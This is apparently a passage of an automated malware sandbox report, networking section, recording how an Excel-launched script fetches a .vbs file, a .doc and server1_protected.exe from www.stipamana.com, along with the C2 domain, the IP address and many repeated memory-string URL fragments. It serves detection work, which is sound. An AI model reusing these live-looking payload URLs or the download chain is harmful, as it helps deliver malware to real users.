                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443

                Networking

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\wscript.exeDomain query: www.stipamana.com
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 87.121.86.205 443Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: dns.stipamana.com
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: global trafficHTTP traffic detected: GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Sfbuild.doc HTTP/1.1Connection: Keep-AliveContent-Type: text/plain; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.stipamana.com
                Source: global trafficHTTP traffic detected: GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/afdtdzrhszdhthsrthsthstgs/server1_protected.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cfhxdfhgjsxgfhxz[1].vbsJump to behavior
                Source: global trafficHTTP traffic detected: GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Sfbuild.doc HTTP/1.1Connection: Keep-AliveContent-Type: text/plain; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.stipamana.com
                Source: global trafficHTTP traffic detected: GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/afdtdzrhszdhthsrthsthstgs/server1_protected.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: www.stipamana.com
                Source: wscript.exe, 00000004.00000003.380859681.0000000003856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380743816.0000000003856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertif
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: wscript.exe, 00000004.00000003.380859681.0000000003856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380743816.0000000003856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.usertruH
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: NXRWIG.exe, 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, NXRWIG.exe, 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.c
                Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.coU
                Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com
                Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/eii
                Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exZZ
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgLL
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgd
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdh00
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhf
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfy
                Source: wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyj
                Source: wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjh
                Source: wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhy
                Source: wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhyd
                Source: wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhyds
                Source: wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsf
                Source: wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfj
                Source: wscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjh
                Source: wscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhy
                Source: wscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhys
                Source: wscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysd
                Source: wscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdg
                Source: wscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgj
                Source: wscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf
                Source: wscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/h
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/s
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/st
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/sty
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styh
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styha
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhag
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagd
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdh
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhg
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgt
                Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgtt
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjw
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwt
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqk
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwY
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrF
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrg3
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgw
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwe
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwer
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerw
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381085396.00000000037C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/d
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/do
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/doc
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjf
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfs
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsd
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkc
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknN
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknd9
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknds$
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsj
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjg
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjgh
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghd
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghds
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdsk
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskf
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsb
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdL
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdf6
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfj
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjg
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjgh
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg
